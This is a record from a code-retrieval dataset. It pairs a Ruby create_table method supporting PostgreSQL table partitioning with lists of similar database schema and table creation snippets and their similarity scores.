"def create_schema(schema)\n ActiveRecord::Base.connection.execute(\"CREATE SCHEMA #{schema}\")\n end",
"def create_database(name, options = {})\n options = { encoding: 'utf8' }.merge!(options.symbolize_keys)\n\n option_string = options.inject(\"\") do |memo, (key, value)|\n memo += case key\n when :owner\n \" OWNER = \\\"#{value}\\\"\"\n else\n \"\"\n end\n end\n\n execute \"CREATE DATABASE #{quote_table_name(name)}#{option_string}\"\n end",
"def create_schema(args={})\n args[:force] ||= false\n\n ActiveRecord::Schema.define do\n create_table :users, force: args[:force] do |t|\n t.string :jid, limit: 512, null: false\n t.string :name, limit: 256, null: true\n t.string :password, limit: 256, null: true\n t.text :vcard, null: true\n end\n add_index :users, :jid, unique: true\n\n create_table :contacts, force: args[:force] do |t|\n t.integer :user_id, null: false\n t.string :jid, limit: 512, null: false\n t.string :name, limit: 256, null: true\n t.string :ask, limit: 128, null: true\n t.string :subscription, limit: 128, null: false\n end\n add_index :contacts, [:user_id, :jid], unique: true\n\n create_table :groups, force: args[:force] do |t|\n t.string :name, limit: 256, null: false\n end\n add_index :groups, :name, unique: true\n\n create_table :contacts_groups, id: false, force: args[:force] do |t|\n t.integer :contact_id, null: false\n t.integer :group_id, null: false\n end\n add_index :contacts_groups, [:contact_id, :group_id], unique: true\n\n create_table :fragments, force: args[:force] do |t|\n t.integer :user_id, null: false\n t.string :root, limit: 256, null: false\n t.string :namespace, limit: 256, null: false\n t.text :xml, null: false\n end\n add_index :fragments, [:user_id, :root, :namespace], unique: true\n end\n end",
"def create_database(name, options = {})\n options = options.reverse_merge(encoding: 'utf8')\n\n option_string = options.symbolize_keys.sum do |key, value|\n case key\n when :owner\n \" OWNER = \\\"#{value}\\\"\"\n when :template\n \" TEMPLATE = \\\"#{value}\\\"\"\n when :encoding\n \" ENCODING = '#{value}'\"\n when :tablespace\n \" TABLESPACE = \\\"#{value}\\\"\"\n when :connection_limit\n \" CONNECTION LIMIT = #{value}\"\n else\n ''\n end\n end\n\n execute(\"CREATE DATABASE #{quote_table_name(name)}#{option_string}\")\n end",
"def create_database(name, options = {})\n options = { :encoding => 'utf8' }.merge!(options.symbolize_keys)\n\n option_string = options.sum do |key, value|\n case key\n when :owner\n \" OWNER = \\\"#{value}\\\"\"\n when :template\n \" TEMPLATE = \\\"#{value}\\\"\"\n when :encoding\n \" ENCODING = '#{value}'\"\n when :collation\n \" LC_COLLATE = '#{value}'\"\n when :ctype\n \" LC_CTYPE = '#{value}'\"\n when :tablespace\n \" TABLESPACE = \\\"#{value}\\\"\"\n when :connection_limit\n \" CONNECTION LIMIT = #{value}\"\n else\n \"\"\n end\n end\n\n execute \"CREATE DATABASE #{quote_table_name(name)}#{option_string}\"\n end",
"def create_database(name, options = {})\n options = options.reverse_merge(:encoding => \"utf8\")\n\n option_string = options.symbolize_keys.sum do |key, value|\n case key\n when :owner\n \" OWNER = \\\"#{value}\\\"\"\n when :template\n \" TEMPLATE = \\\"#{value}\\\"\"\n when :encoding\n \" ENCODING = '#{value}'\"\n when :tablespace\n \" TABLESPACE = \\\"#{value}\\\"\"\n when :connection_limit\n \" CONNECTION LIMIT = #{value}\"\n else\n \"\"\n end\n end\n\n execute \"CREATE DATABASE #{quote_table_name(name)}#{option_string}\"\n end",
"def create_schema\n PgTools.create_schema id unless PgTools.schemas.include? id.to_s\n end",
"def create(schema,and_migrate = true)\n conn = ActiveRecord::Base.connection\n conn.execute(\"CREATE SCHEMA #{schema}\") unless conn.schema_exists? schema\n self.migrate(schema) if and_migrate\n end",
"def create_database_sql(name, opts = {})\n \"CREATE DATABASE #{quote_identifier(name)}\"\n end",
"def create_database(name)\n end",
"def drop_schema(name, opts = {})\n execute_ddl(drop_schema_sql(name, opts))\n end",
"def create_schema\n Apartment::Database.create(subdomain)\n end",
"def drop_schema_sql(name, opts=OPTS)\n \"DROP SCHEMA#{' IF EXISTS' if opts[:if_exists]} #{quote_identifier(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def create\n database.command({ :create => name }.merge(options))\n end",
"def schema(schema_name, stream)\n stream << \" create_schema \\\"#{schema_name}\\\"\\n\"\n end",
"def create_table(name, &block)\n g = Schema::Generator.new(self, &block)\n create_table_sql_list(name, *g.create_info).each {|sql| execute(sql)}\n end",
"def ensure_tenant_schema_exists\n logger.info \"Creating new schema '#{db_name}' ...\"\n if schema_exists?\n logger.info \"Schema '#{db_name}' already existed!\"\n else\n Apartment::Tenant.create(db_name)\n end\n rescue Apartment::SchemaExists => e\n logger.info \"#{e.class.name}: Schema '#{db_name}' already existed!\"\n end",
"def set_schema(name = nil, &block)\n set_dataset(db[name]) if name\n @schema = db.create_table_generator(&block)\n set_primary_key(@schema.primary_key_name) if @schema.primary_key_name\n end",
"def drop_schema(schema_name, options = {})\n execute \"DROP SCHEMA#{' IF EXISTS' if options[:if_exists]} #{quote_schema_name(schema_name)} CASCADE\"\n end",
"def create_table(name, &block)\n DB.drop_table? name if @opts.drop_tables?\n DB.create_table? name.to_sym, &block\n info \"Setup database table: #{name}\"\n end",
"def schema(name)\n get(\"schemas/#{name}/\", \"schema\")\n end",
"def apply_schema(name, type, options={})\n raise NotImplementedError\n end",
"def drop_schema_sql(name, opts = {})\n \"DROP SCHEMA #{quote_identifier(name)} CASCADE\"\n end",
"def create\n @schema = Schema.new(schema_params)\n\n respond_to do |format|\n if @schema.save\n format.html { redirect_to @schema, notice: 'Schema was successfully created.' }\n format.json { render :show, status: :created, location: @schema }\n else\n format.html { render :new }\n format.json { render json: @schema.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @schema = Schema.new(schema_params)\n\n respond_to do |format|\n if @schema.save\n format.html { redirect_to @schema, notice: 'Schema was successfully created.' }\n format.json { render :show, status: :created, location: @schema }\n else\n format.html { render :new }\n format.json { render json: @schema.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create_database(name, options = {})\n if options[:collation]\n execute \"CREATE DATABASE #{quote_table_name(name)} DEFAULT COLLATE #{quote_table_name(options[:collation])}\"\n elsif options[:charset]\n execute \"CREATE DATABASE #{quote_table_name(name)} DEFAULT CHARACTER SET #{quote_table_name(options[:charset])}\"\n elsif row_format_dynamic_by_default?\n execute \"CREATE DATABASE #{quote_table_name(name)} DEFAULT CHARACTER SET `utf8mb4`\"\n else\n raise \"Configure a supported :charset and ensure innodb_large_prefix is enabled to support indexes on varchar(255) string columns.\"\n end\n end",
"def create_publication(name, all_tables = false, tables = [], options = {})\n base_command = \"CREATE PUBLICATION #{connection.quote_ident(name)}\"\n if all_tables\n base_command << \" FOR ALL TABLES\"\n elsif !tables.empty?\n base_command << \" FOR TABLE #{safe_list(tables)}\"\n end\n typed_exec(@command_builder.command_with_options(base_command, \"WITH\", options))\n end",
"def drop_schema(name, opts=OPTS)\n self << drop_schema_sql(name, opts)\n end",
"def drop_schema_sql(name, opts = {})\n \"DROP SCHEMA #{quote_identifier(name)}\"\n end",
"def create_extension(extension_name, options = {})\n options = CREATE_EXTENSION_DEFAULTS.merge(options.symbolize_keys)\n\n sql = ['CREATE EXTENSION']\n sql << 'IF NOT EXISTS' if options[:if_not_exists]\n sql << %Q{\"#{extension_name.to_s}\"}\n sql << \"SCHEMA #{options[:schema_name]}\" if options[:schema_name].present?\n sql << \"VERSION '#{options[:version]}'\" if options[:version].present?\n sql << \"FROM #{options[:old_version]}\" if options[:old_version].present?\n\n sql = sql.join(' ')\n execute(sql)\n end",
"def create\n @schema = Schema.new(params[:schema])\n\n respond_to do |format|\n if @schema.save\n format.html { redirect_to @schema, notice: 'Schema was successfully created.' }\n format.json { render json: @schema, status: :created, location: @schema }\n else\n format.html { render action: \"new\" }\n format.json { render json: @schema.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create_schema schema_id, type, definition, options = {}\n schema = Google::Cloud::PubSub::V1::Schema.new(\n type: type,\n definition: definition\n )\n schemas.create_schema parent: project_path(options),\n schema: schema,\n schema_id: schema_id\n end",
"def add_schema(export_type = nil)\n mig_text = schema_generator_script(db_migration_schema, 'create')\n write_db_migration mig_text, \"#{db_migration_schema}_schema\", export_type: export_type\n end",
"def create\n @schema = Schema.new(params[:schema])\n\n respond_to do |format|\n if @schema.save\n format.html { redirect_to @schema, :notice => 'Schema was successfully created.' }\n format.json { render :json => @schema, :status => :created, :location => @schema }\n else\n format.html { render :action => \"new\" }\n format.json { render :json => @schema.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def schema_exists?(name)\n select_value(\"SELECT COUNT(*) FROM pg_namespace WHERE nspname = '#{name}'\", 'SCHEMA').to_i > 0\n end",
"def schema_exists?(name)\n select_value(\"SELECT COUNT(*) FROM pg_namespace WHERE nspname = '#{name}'\", 'SCHEMA').to_i > 0\n end",
"def create_table!(name, &block)\n drop_table(name) rescue nil\n create_table(name, &block)\n end",
"def create_database!(name=nil)\n db = if name\n self.server.database!(db_name_with_prefix(name))\n else\n self.database!\n end\n create_rotation_filter(db)\n if self.respond_to?(:design_doc)\n design_doc.sync!(db)\n # or maybe this?:\n #self.design_docs.each do |design|\n # design.migrate(to_db)\n #end\n end\n return db\n end",
"def create_db(options)\n info \"Created database '#{options[:name]}'\"\n end",
"def create_db name\n \n req = Net::HTTP::Put.new \"/#{name}\"\n ret = @http.request req\n \n puts \"Creating Database #{name} => #{ret.msg} (#{ret.code})\\n\"\n \n end",
"def create_mysql_database(schema=\"\")\n @mysql_database = true\n MysqlUtils.create_mysql_database(database_name, schema)\n end",
"def register(name)\n Schemas.register(name, self)\n end",
"def schema_generator_script(schema_name, mode = 'create', owner: DefaultSchemaOwner)\n cname = \"#{mode}_#{schema_name}_schema_#{migration_version}\".camelize\n\n <<~CONTENT\n require 'active_record/migration/app_generator'\n class #{cname} < ActiveRecord::Migration[5.2]\n include ActiveRecord::Migration::AppGenerator\n\n def change\n self.schema = '#{schema_name}'\n self.owner = '#{owner}'\n create_schema\n end\n end\n CONTENT\n end",
"def create_search_schema(name, content)\n @data[:search_schemas][name] = {:name => name, :content => content}\n true\n end",
"def create_database(name)\n @logger.unknown(\"ODBCAdapter#create_database>\") if @trace\n @logger.unknown(\"args=[#{name}]\") if @trace\n execute \"CREATE DATABASE #{name}\"\n rescue Exception => e\n @logger.unknown(\"exception=#{e}\") if @trace\n raise\n end",
"def create_migration(name, options = {})\n CreateMigration.perform(\n name,\n options\n )\n end",
"def createUserTable\n @Handle.execute( @UserSchema ) \n end",
"def create(name)\n package = Package.new(name)\n package.name = name\n package.version = '1.0.0'\n empty_directory(name)\n empty_directory(File.join(name, 'operations'))\n empty_directory(File.join(name, 'resources'))\n template('metadata.rb.erb', File.join(name, 'metadata.rb'))\n\n if options[:vagrant]\n template('Vagrantfile.erb', File.join(name, 'Vagrantfile'))\n end\n\n if options[:docker]\n template('Dockerfile.erb.erb', File.join(name, 'Dockerfile.erb'))\n end\n end",
"def create_table_prefix_sql(name, options)\n prefix_sql = if options[:temp]\n raise(Error, \"can't provide both :temp and :unlogged to create_table\") if options[:unlogged]\n raise(Error, \"can't provide both :temp and :foreign to create_table\") if options[:foreign]\n temporary_table_sql\n elsif options[:foreign]\n raise(Error, \"can't provide both :foreign and :unlogged to create_table\") if options[:unlogged]\n 'FOREIGN '\n elsif options[:unlogged]\n 'UNLOGGED '\n end\n\n \"CREATE #{prefix_sql}TABLE#{' IF NOT EXISTS' if options[:if_not_exists]} #{options[:temp] ? quote_identifier(name) : quote_schema_table(name)}\"\n end",
"def create_table_prefix_sql(name, options)\n \"CREATE #{temporary_table_sql if options[:temp]}TABLE#{' IF NOT EXISTS' if options[:if_not_exists]} #{options[:temp] ? quote_identifier(name) : quote_schema_table(name)}\"\n end",
"def create_table(*args, &block)\n db.create_table(name,*args, &block)\n end",
"def add_synonym(name, table_name, options = {})\n sql = \"CREATE\"\n if options[:force] == true\n sql << \" OR REPLACE\"\n end\n sql << \" SYNONYM #{quote_table_name(name)} FOR #{quote_table_name(table_name)}\"\n execute sql\n end",
"def create\n @schema_table = SchemaTable.new(schema_table_params)\n\n respond_to do |format|\n if @schema_table.save\n format.html { redirect_to @schema_table, notice: 'Schema table was successfully created.' }\n format.json { render :show, status: :created, location: @schema_table }\n else\n format.html { render :new }\n format.json { render json: @schema_table.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create_database_schema!\n \n if file_format.class.const_defined?('Database')\n @orm_module = file_format.class.const_get('Database')\n else\n @orm_module = file_format.class.const_set('Database', Module.new)\n end\n\n create_request_table_and_class\n create_warning_table_and_class\n \n file_format.line_definitions.each do |name, definition|\n create_database_table(name, definition)\n create_activerecord_class(name, definition)\n end\n end",
"def recreate_database(name, options = {})\n drop_database(name)\n create_database(name, options)\n end",
"def create!(con)\n con.exec create_stmt\n end",
"def create(name)\n url = prefix + \"create\" + \"&name=#{name}\"\n return response(url)\n end",
"def create(name)\n url = prefix + \"create\" + \"&name=#{name}\"\n return response(url)\n end",
"def create (name, attrs = {})\n factory_by_name(name).create(attrs)\n end",
"def create (name, attrs = {})\n factory_by_name(name).create(attrs)\n end",
"def drop_schema schema_name\n execute \"DROP SCHEMA #{schema_name} CASCADE\"\n end",
"def initialize_schema!\n Schema.create(self)\n end",
"def schema(table_name = nil, opts={})\n table_name = table_name.to_sym if table_name\n if opts[:reload] && @schemas\n if table_name\n @schemas.delete(table_name)\n else\n @schemas = nil\n end\n end\n\n if @schemas\n if table_name\n return @schemas[table_name] if @schemas[table_name]\n else\n return @schemas\n end\n end\n\n if table_name\n @schemas ||= {}\n if respond_to?(:schema_parse_table, true)\n @schemas[table_name] ||= schema_parse_table(table_name, opts)\n else\n raise Error, 'schema parsing is not implemented on this database'\n end\n else\n if respond_to?(:schema_parse_tables, true)\n @schemas = schema_parse_tables(opts)\n elsif respond_to?(:schema_parse_table, true) and respond_to?(:tables, true)\n tables.each{|t| schema(t, opts)}\n @schemas\n else\n raise Error, 'schema parsing is not implemented on this database'\n end\n end\n end",
"def create(database_id:, name:)\n path = '/databases'\n\n if database_id.nil?\n raise Appwrite::Exception.new('Missing required parameter: \"databaseId\"')\n end\n\n if name.nil?\n raise Appwrite::Exception.new('Missing required parameter: \"name\"')\n end\n\n params = {\n databaseId: database_id,\n name: name,\n }\n \n headers = {\n \"content-type\": 'application/json',\n }\n\n @client.call(\n method: 'POST',\n path: path,\n headers: headers,\n params: params,\n response_type: Models::Database\n )\n end",
"def recreate_database(name, options = {}) #:nodoc:\n drop_database(name)\n create_database(name, options)\n end",
"def create_table_with_storing_name(table_name, options = {}, &block)\n @@table_name = table_name\n create_table_without_storing_name table_name, options, &block\n AirBlade::Migrations::SchemaDefinitions.foreign_keys = []\n end",
"def create(options = {})\n options[:name] ||= SecureRandom.hex\n\n create_options = { p: port }\n create_options[:c] = options[:name] if options[:name]\n create_options[:d] = options[:dir] if options[:dir]\n exec(\"create\", create_options)\n\n options[:name]\n end",
"def create_table!(*args, &block)\n drop_table?\n create_table(*args, &block)\n end",
"def create_database(db_name)\n ret = PureHailDB.ib_database_create(db_name)\n if ret != true\n check_return_code(PureHailDB::DbError[:DB_ERROR])\n end\n end",
"def create_table?(name, options=OPTS, &block)\n if options[:partition_of]\n create_table(name, options.merge!(:if_not_exists=>true), &block)\n return\n end\n\n super\n end",
"def create_database(name, charset)\n database = ::MySQL::Database.create(name, charset)\n !database.nil?\n end",
"def alter_sequence_schema(name, schema, options = {})\n execute(\"ALTER SEQUENCE #{quote_sequence(name)} SET SCHEMA #{quote_schema(schema)};\")\n end",
"def schema(name, file=nil, &block)\n extend_schema(Schema.new(name), file, &block)\n end",
"def migration(version, fingerprint, name)\n SchemaMigration.create!(version: version, migrated_at: Time.now, fingerprint: fingerprint, name: name)\n end",
"def schema(schema_name)\n state_depth_must_be(States::DOMAIN)\n s = schema_lookup(schema_name)\n if s.nil?\n n = Schema.new(@current_domain, schema_name)\n @current_domain.schemas << n\n @current_schema = n\n else\n @current_schema = s\n end\n clear_state_below(States::SCHEMA)\n end",
"def user_defined_schemas(stream)\n return if (list = (@connection.user_defined_schemas - ['public'])).empty?\n\n stream.puts \" # Custom schemas defined in this database.\"\n list.each { |name| stream.puts \" create_schema \\\"#{name}\\\", force: :cascade\" }\n stream.puts\n end",
"def create_db(opts)\n\t\tbegin\n\t\t\tcase opts[\"adapter\"]\n\t\t\twhen 'sqlite3'\n\t\t\t\t# Sqlite just needs the file to be writable. ActiveRecord creates\n\t\t\t\t# it if it doesn't exist and checks permissions if it does. This\n\t\t\t\t# all happens during establish_connection(), so we don't need to\n\t\t\t\t# bother with creating anything here.\n\t\t\twhen 'postgresql','mysql'\n\t\t\t\tActiveRecord::Base.establish_connection(opts.merge('database' => nil))\n\t\t\t\tActiveRecord::Base.connection.create_database(opts['database'])\n\t\t\t\tActiveRecord::Base.remove_connection\n\t\t\tend\n\t\trescue ::Exception => e\n\t\t\tilog(\"Trying to continue despite failed database creation: #{e}\")\n\t\tend\n\tend",
"def delete\n ensure_service!\n service.delete_schema name\n true\n end",
"def create_database\n $conn.exec(\"\"\"\n CREATE TABLE users (\n id SERIAL NOT NULL,\n name varchar(255) NOT NULL,\n created_at timestamp NOT NULL,\n PRIMARY KEY (id)\n );\n CREATE UNIQUE INDEX user_names ON users (name);\n CREATE TABLE blathers (\n id SERIAL NOT NULL,\n text varchar(141) NOT NULL,\n created_at timestamp NOT NULL,\n user_id integer NOT NULL,\n PRIMARY KEY (id)\n );\n CREATE TABLE blathers_mentioned_users (\n blather_id integer NOT NULL,\n user_id integer NOT NULL,\n PRIMARY KEY (blather_id, user_id)\n );\n \"\"\")\nend",
"def create_table(name)\n if ! db.tables.include?(name.to_sym)\n db.create_table name do\n String :name, :size => 15\n Float :freq\n index :freq\n end\n end\n end",
"def initialize(name, opts = {})\n super\n initialize_schema_module(opts)\n end",
"def supports_create_table_if_not_exists?\n true\n end",
"def create_index(schema, opts = {})\n call(ft_create(schema, opts))\n end",
"def create_db_schema(connection)\n connection.execute 'CREATE TABLE documents (id INTEGER PRIMARY KEY AUTOINCREMENT, name)'\n connection.execute 'CREATE TABLE words (id, doc_id, value)'\n connection.execute 'CREATE TABLE characters (id, word_id, value)'\nend",
"def createUserTable\n @conn.exec(\"CREATEE users (id serial NOT NULL, name character varying(255), CONSTRAINT users_pkey PRIMARY KEY (id)) WITH (OIDS=FALSE);\");\n end",
"def drop_schema(schema_name)\n execute(\"DROP SCHEMA \\\"#{schema_name}\\\"\")\n end",
"def recreate_database(name)\n existing_database = current_database.to_s\n if name.to_s == existing_database\n do_execute 'USE master' \n end\n drop_database(name)\n create_database(name)\n ensure\n do_execute \"USE #{existing_database}\" if name.to_s == existing_database \n end",
"def schema_params\n params.require(:schema).permit(:name)\n end",
"def supports_create_table_if_not_exists?\n false\n end",
"def recreate_database(name, options = {})\n drop_database(name)\n sql = create_database(name, options)\n reconnect!\n sql\n end"
] |
[
"0.7882215",
"0.76678604",
"0.76181155",
"0.73712593",
"0.73512733",
"0.7165824",
"0.70954925",
"0.69713676",
"0.6500826",
"0.6297565",
"0.62504894",
"0.61846215",
"0.6069834",
"0.6034471",
"0.59912986",
"0.59591717",
"0.5923187",
"0.5832113",
"0.5630911",
"0.56262213",
"0.5587867",
"0.55720395",
"0.5551262",
"0.55249834",
"0.55112267",
"0.5502928",
"0.5403313",
"0.53866345",
"0.5371765",
"0.5361246",
"0.53264034",
"0.5317269",
"0.52865463",
"0.5253378",
"0.5253378",
"0.52513325",
"0.5245612",
"0.52435523",
"0.5231833",
"0.51460785",
"0.514555",
"0.51414484",
"0.51388615",
"0.5136635",
"0.5105243",
"0.5102611",
"0.51007867",
"0.50817937",
"0.50630337",
"0.50615627",
"0.50566685",
"0.5049342",
"0.5041024",
"0.502128",
"0.5012393",
"0.49800578",
"0.49620852",
"0.49372035",
"0.4930603",
"0.49232903",
"0.4895915",
"0.48699617",
"0.48601967",
"0.48437077",
"0.48408243",
"0.48137194",
"0.48124063",
"0.48048952",
"0.47904083",
"0.47904083",
"0.4776201",
"0.47760236",
"0.47629443",
"0.476234",
"0.47588584",
"0.47569877",
"0.4755187",
"0.4749755",
"0.47438842",
"0.47367674",
"0.4733751",
"0.4725232",
"0.47026175",
"0.4701033",
"0.46894988",
"0.46836555",
"0.4664511",
"0.4657183",
"0.46507302",
"0.46415",
"0.4632745",
"0.46227285",
"0.4607051",
"0.46066624",
"0.46032542",
"0.4586925",
"0.4584271",
"0.4578395",
"0.45770708",
"0.4576083"
] |
0.76356405
|
2
|
Support partitions of tables using the :partition_of option.
|
def create_table(name, options=OPTS, &block)
if options[:partition_of]
create_partition_of_table_from_generator(name, CreatePartitionOfTableGenerator.new(&block), options)
return
end
super
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def partitioned_tables\n PartitionedTables.new(connection).all\n end",
"def create_partition_of_table_sql(name, generator, options)\n sql = create_table_prefix_sql(name, options).dup\n\n sql << \" PARTITION OF #{quote_schema_table(options[:partition_of])}\"\n\n case generator.partition_type\n when :range\n from, to = generator.range\n sql << \" FOR VALUES FROM #{literal(from)} TO #{literal(to)}\"\n when :list\n sql << \" FOR VALUES IN #{literal(generator.list)}\"\n when :hash\n mod, remainder = generator.hash_values\n sql << \" FOR VALUES WITH (MODULUS #{literal(mod)}, REMAINDER #{literal(remainder)})\"\n else # when :default\n sql << \" DEFAULT\"\n end\n\n sql << create_table_suffix_sql(name, options)\n\n sql\n end",
"def all\n partitions.group_by { |row| row['table_name'] }.map(&method(:to_tablature_table))\n end",
"def list_partitions(table_name, params = {})\n all_params = approved_tables.smash(table_name, params)\n validation.validate_parameters(all_params)\n partitions(all_params)\n end",
"def create_partitions\n info(\"Creating disk with #{PARTITION_TABLE_TYPE} parition table\")\n execute!(\"parted -s #{@dev} mklabel #{PARTITION_TABLE_TYPE}\")\n\n start_size = FIRST_PARTITION_OFFSET\n end_size = FIRST_PARTITION_OFFSET\n\n unspec_part = nil\n\n # Create the partitions\n @partition_layout.each_with_index do |part, index|\n # Deal with any \"open ended\" partitions last\n if not part.size_mb.is_a?(Integer)\n unspec_part = part\n next\n end\n\n start_size = end_size\n end_size += part.size_mb\n\n info(\"Creating partition #{part.label} (#{part.fs}, #{part.size_mb}MiB)\")\n execute!(\"parted #{@dev} mkpart #{part.label} #{part.fs} #{start_size}MiB #{end_size}MiB\")\n\n (part.flags || {}).each_pair { |k, v|\n info(\"Setting partition flag #{k} to #{v}\")\n execute!(\"parted #{@dev} set #{index + 1} #{k} #{v}\")\n }\n\n label_path = \"/dev/disk/by-partlabel/#{part.label}\"\n self.wait_for_device(label_path)\n\n if not part.fs\n warn(\"No filesystem specified for #{part.label}. Skipping FS\")\n else\n create_filesystem(part.fs, label_path, part.label)\n end\n\n if part.lvm\n notice(\"Setting up LVM on #{part.label}\")\n setup_lvm_on_partition(part)\n end\n end\n\n # Deal with any \"open ended\" partitions (that have an unspecified size_mb)\n if unspec_part\n part = unspec_part\n info(\"Creating partition #{part.label} (#{part.fs}, 100% remaining)\")\n execute!(\"parted #{@dev} mkpart #{part.label} #{part.fs} #{end_size}MiB 100%\")\n\n (part.flags || {}).each_pair { |k, v|\n info(\"Setting partition flag #{k} to #{v}\")\n execute!(\"parted #{@dev} set #{@partition_layout.length} #{k} #{v}\")\n }\n\n label_path = \"/dev/disk/by-partlabel/#{part.label}\"\n self.wait_for_device(label_path)\n create_filesystem(part.fs, label_path, part.label) if part.fs\n\n if part.lvm\n notice(\"Setting up LVM on #{part.label}\")\n setup_lvm_on_partition(part)\n end\n end\n\n nil\n end",
"def partition_type\n raise Error, \"Unable to determine partition type, multiple different partitioning methods called\" if [@from || @to, @list, @modulus || @remainder, @default].compact.length > 1\n\n if @from || @to\n raise Error, \"must call both from and to when creating a partition of a table if calling either\" unless @from && @to\n :range\n elsif @in\n :list\n elsif @modulus || @remainder\n raise Error, \"must call both modulus and remainder when creating a partition of a table if calling either\" unless @modulus && @remainder\n :hash\n elsif @default\n :default\n else\n raise Error, \"unable to determine partition type, no partitioning methods called\"\n end\n end",
"def partition_list()\nend",
"def partitions\n [6, 3, 0].map { |n| model.id / 10**n % 1000 }\n end",
"def partitions( partition_count, &proc )\n Enumerable.partition_sizes( self.size, partition_count ) do |partition|\n partitioned_collection = []\n consumed_so_far = 0\n partition.each do |partition_size|\n partitioned_collection << self[ consumed_so_far, partition_size ]\n consumed_so_far += partition_size\n end\n yield partitioned_collection\n end\n end",
"def create_table?(name, options=OPTS, &block)\n if options[:partition_of]\n create_table(name, options.merge!(:if_not_exists=>true), &block)\n return\n end\n\n super\n end",
"def partition_for!(key)\n if leader_available?\n # Use the configured partitioner\n partition_id = partitioner.call(key, available_partitions.count, partitions.count)\n partition!(partition_id)\n else\n error_code.raise\n end\n end",
"def table_name(*partition_key_values)\n return collect_first(*partition_key_values, &:table_name)\n end",
"def set_partition\n @partition = Partition.find(params[:id])\n end",
"def partition!(id)\n partition(id) || ErrorCode[:unknown_topic_or_partition].raise\n end",
"def partition_device\n Souffle::Log.info \"#{@node.log_prefix} Partitioning the device...\"\n provider.partition(@node)\n end",
"def supports_indexes_on_partitioned_tables?\n postgresql_version >= 110_000\n end",
"def create_partition_of_table_from_generator(name, generator, options)\n execute_ddl(create_partition_of_table_sql(name, generator, options))\n end",
"def create_partition device, partition_type = 'primary', start_unit, end_unit\n command = 'parted'\n params = \"#{device.path} -s -a optimal unit MB mkpart #{partition_type} ext3 #{start_unit} -- #{end_unit}\"\n parted = CommandsExecutor.new command, params\n parted.execute\n raise \"Command execution error: #{parted.stderr.read}\" if not parted.success?\n probe_kernal device\n end",
"def SetFormatPartitions(fstabpart)\n fstabpart = deep_copy(fstabpart)\n # All storage devices\n target_map = Storage.GetTargetMap\n\n # all activated\n tmp = Builtins.filter(RootPart.GetActivated) do |e|\n Ops.get_string(e, :type, \"\") == \"mount\" ||\n Ops.get_string(e, :type, \"\") == \"swap\"\n end\n\n Builtins.foreach(tmp) do |e|\n mntpt = Ops.get_string(e, :type, \"\") == \"swap\" ?\n \"swap\" :\n Ops.get_string(e, :mntpt, \"\")\n part = Ops.get_string(e, :device, \"\")\n p = {}\n Builtins.foreach(fstabpart) do |pp|\n # mountpoint matches\n if Ops.get_string(pp, \"mount\", \"\") == mntpt\n p = deep_copy(pp)\n raise Break\n end\n end\n mount_options = \"\"\n Builtins.foreach(Storage.ReadFstab(Installation.destdir)) do |entry|\n if Ops.get_string(entry, \"file\", \"\") == mntpt\n mount_options = Ops.get_string(entry, \"mntops\", \"\")\n raise Break\n end\n end\n target_map = Storage.SetPartitionData(target_map, part, \"mount\", mntpt)\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"format\",\n Ops.get_boolean(p, \"format\", false)\n )\n target_map = Storage.SetPartitionData(target_map, part, \"delete\", false)\n target_map = Storage.SetPartitionData(target_map, part, \"create\", false)\n if Builtins.haskey(p, \"filesystem\")\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"filesystem\",\n Ops.get_symbol(p, \"filesystem\", :ext4)\n )\n end\n if Ops.greater_than(Builtins.size(mount_options), 0) &&\n !Builtins.haskey(p, \"fstopt\")\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"fstopt\",\n mount_options\n )\n end\n if Builtins.haskey(p, \"fstopt\")\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"fstopt\",\n Ops.get_string(p, \"fstopt\", \"\")\n )\n end\n if Builtins.haskey(p, \"mountby\")\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"mountby\",\n Ops.get_symbol(p, \"mountby\", :device)\n )\n end\n end\n\n Storage.SetTargetMap(target_map)\n true\n end",
"def create_range_partition(table_name, options, &block)\n raise ArgumentError, 'partition_key must be defined' if options[:partition_key].nil?\n\n Tablature.database.create_range_partition(table_name, options, &block)\n end",
"def addPartition(ptStr)\n pts_array = ptStr.split(',')\n sqlstr = \"ALTER TABLE \" + @mProjectName + \".\" + @mTableName\n sqlstr = sqlstr + \" ADD IF NOT EXISTS\" + \" PARTITION (\"\n pts_array.each { |pt|\n ptkv = pt.split('=')\n if ptkv.size != 2\n raise \"invalid partition spec\" + pt\n end\n sqlstr += ptkv[0] + '=' + \"'\" + ptkv[1] + \"'\" + ','\n }\n sqlstr = sqlstr[0..-2] + \");\"\n taskName = \"SQLAddPartitionTask\"\n runSQL(taskName, sqlstr)\n end",
"def partition(id)\n partitions.detect {|partition| partition.id == id}\n end",
"def make_partition_list(withall, flavor)\n part_list = []\n Builtins.foreach(RootPart.rootPartitions) do |partition, i|\n # see https://bugzilla.novell.com/attachment.cgi?id=96783&action=view\n\n # see bugzilla #288201\n # architecture needs to be valid when updating, not booting\n arch_is_valid = flavor == :boot ?\n true :\n Ops.get_boolean(i, :arch_valid, false)\n if withall || Ops.get_boolean(i, :valid, false) && arch_is_valid\n # `ext2, `jfs, ...\n part_fs = Ops.get_symbol(i, :fs)\n part_fs_name = Builtins.tostring(part_fs)\n if part_fs_name != nil &&\n Builtins.regexpmatch(part_fs_name, \"^`(.*)$\")\n part_fs_name = Builtins.regexpsub(part_fs_name, \"^`(.*)$\", \"\\\\1\")\n end\n\n system = Ops.get_string(i, :name, \"error\")\n # unknown system\n if system == \"unknown\"\n if part_fs != nil\n if CanBeLinuxRootFS(part_fs)\n # Table item (unknown system)\n system = _(\"Unknown Linux\")\n else\n # Table item (unknown system)\n system = _(\"Unknown or Non-Linux\")\n end\n else\n # Table item (unknown system [neither openSUSE 11.1 nor SLES 14 nor ...])\n system = _(\"Unknown\") if system == \"unknown\"\n end\n end\n\n arch = Ops.get_string(i, :arch, \"error\")\n # Table item (unknown architecture)\n arch = _(\"Unknown\") if arch == \"unknown\"\n\n # fist, use the name of file system (with short name for Linux)\n # then the file system short name\n # then \"Unknown\"\n fs = 